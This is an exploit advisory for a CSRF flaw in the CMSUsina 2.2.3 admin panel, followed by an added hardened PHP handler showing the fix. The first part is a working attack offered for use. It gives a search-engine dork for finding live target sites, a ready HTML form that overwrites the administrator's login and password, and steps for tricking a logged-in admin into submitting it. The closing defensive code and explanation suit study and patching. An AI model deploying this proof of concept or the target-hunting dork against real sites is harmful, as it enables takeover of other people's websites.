====================================================================================================================================
| # Title     : CMSUsina V2.2.3 CSRF Add Admin Vulnerability                                                                       |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             |
| # Vendor    : http://www.ysy.com.br/                                                                                             |  
| # Dork      : "Desenvolvido por Usina da Criação"                                                                                |
====================================================================================================================================

PoC :

[+] Find targets by dorking in Google or another search engine.

[+] The HTML below is the admin "change access data" form from the CMS, stripped of its page wrapper. The handler accepts it with nothing but the admin's session cookie: no anti-CSRF token, no Origin/Referer check, and the current password is never asked for, so the form can be submitted from any site.

[+] Affected file : site/adm/user.php

[+] Example target : http://127.0.0.1/site/adm/user.php

[+] On the form line (line 3 of the HTML), set the action attribute to the target site; set the login/login2 and senha/senha2 values to the credentials you want.

[+] Save the code as poc.html and get a logged-in administrator to open it and submit the form. The POST rides on the admin's session, the admin login and password are replaced with your values, and you can then log in to site/adm/ as admin.

<html><body>
<p>Alterar seus dados de acesso</p> <fieldset><legend>ALTERAR DADOS</legend>
<form name="editsenha" method="post" action="http://127.0.0.1/site/adm/user.php?acao=edit">
<!-- set the action above to the target site; fill login/login2 and senha/senha2 with the credentials you want -->
<!-- new admin login, entered twice as the CMS form expects -->
<label><b>Usu&aacute;rio</b></label><br />
<input type="text" name="login" value="." maxlength="14" size="70" /><br /><br />
<label><b>Confirmar usu&aacute;rio</b></label><br />
<input type="text" name="login2" value="." maxlength="14" size="70" /><br /><br />
<!-- new admin password, entered twice; the current password is never requested -->
<label><b>Senha</b></label><br />
<input type="password" name="senha" value="." maxlength="14" size="70" /><br /><br />
<label><b>Confirmar senha</b></label><br />
<input type="password" name="senha2" value="." maxlength="14" size="70" /><br /><br />
<input type="submit" name="submit" value="Alterar senha" />
</form> </fieldset>
</body></html>
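The form is accepted because user.php?acao=edit trusts the session cookie alone. Below is an added example of how the handler would look with the usual defences, written for this advisory; it is not CMSUsina's code (the real user.php is not shown here). It keeps the page's field names (login, login2, senha, senha2) and assumes a PDO connection in `$pdo`, a `usuarios` table with `id`, `login` and `senha_hash` columns, and the admin's id in `$_SESSION['user_id']`; a `senha_atual` (current password) field is added to the form. The checks are: a per-session synchronizer token compared in constant time, an Origin/Referer host check as a second layer, and re-authentication with the current password before credentials change.

```php
<?php
// Added example, not CMSUsina's code: CSRF-hardened sketch of site/adm/user.php?acao=edit.
// Assumptions: $pdo (PDO), table `usuarios`(id, login, senha_hash), $_SESSION['user_id'].
session_start();

// 1. One random token per session, rendered into the form as a hidden field.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// 2. Constant-time comparison of the submitted token against the session copy.
function csrf_token_is_valid($submitted): bool {
    return is_string($submitted)
        && !empty($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

// 3. Defence in depth: browsers send Origin (or at least Referer) on cross-site POSTs.
//    Whichever is present must name this host; if neither is present, treat as cross-site.
function request_is_same_origin(): bool {
    $expected = strtolower(explode(':', $_SERVER['HTTP_HOST'] ?? '')[0]);
    foreach (['HTTP_ORIGIN', 'HTTP_REFERER'] as $h) {
        if (!empty($_SERVER[$h])) {
            $host = parse_url($_SERVER[$h], PHP_URL_HOST);
            return is_string($host) && strtolower($host) === $expected;
        }
    }
    return false;
}

if (($_GET['acao'] ?? '') === 'edit' && ($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    if (!csrf_token_is_valid($_POST['csrf_token'] ?? null) || !request_is_same_origin()) {
        http_response_code(403);
        exit('Request rejected.');
    }
    $login  = $_POST['login']  ?? '';
    $login2 = $_POST['login2'] ?? '';
    $senha  = $_POST['senha']  ?? '';
    $senha2 = $_POST['senha2'] ?? '';
    $atual  = $_POST['senha_atual'] ?? '';   // added field: the current password
    if ($login === '' || $senha === '' || $login !== $login2 || $senha !== $senha2) {
        http_response_code(400);
        exit('Invalid data.');
    }
    // 4. Re-authenticate before changing credentials (assumed schema).
    $stmt = $pdo->prepare('SELECT senha_hash FROM usuarios WHERE id = ?');
    $stmt->execute([$_SESSION['user_id']]);
    $hash = $stmt->fetchColumn();
    if ($hash === false || !password_verify($atual, $hash)) {
        http_response_code(403);
        exit('Current password is wrong.');
    }
    $stmt = $pdo->prepare('UPDATE usuarios SET login = ?, senha_hash = ? WHERE id = ?');
    $stmt->execute([$login, password_hash($senha, PASSWORD_DEFAULT), $_SESSION['user_id']]);
    session_regenerate_id(true);   // drop any session id fixed before the change
    exit('Credentials updated.');
}
?>
<!-- The form now carries the token; the PoC above cannot know it from another origin. -->
<form name="editsenha" method="post" action="user.php?acao=edit">
  <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token()) ?>" />
  <label><b>Senha atual</b></label><br />
  <input type="password" name="senha_atual" maxlength="14" size="70" /><br /><br />
  <label><b>Usu&aacute;rio</b></label><br />
  <input type="text" name="login" maxlength="14" size="70" /><br /><br />
  <label><b>Confirmar usu&aacute;rio</b></label><br />
  <input type="text" name="login2" maxlength="14" size="70" /><br /><br />
  <label><b>Senha</b></label><br />
  <input type="password" name="senha" maxlength="14" size="70" /><br /><br />
  <label><b>Confirmar senha</b></label><br />
  <input type="password" name="senha2" maxlength="14" size="70" /><br /><br />
  <input type="submit" name="submit" value="Alterar senha" />
</form>
```

With this in place the poc.html above fails at the first check: an attacker's page cannot read the victim's `csrf_token`, and even a leaked token is rejected when the POST arrives with a foreign Origin. Marking the session cookie `SameSite=Lax` (via `session_set_cookie_params()`) is a further layer, but it should be added on top of the token, not instead of it, since older browsers ignore it.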

Greetings to :=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================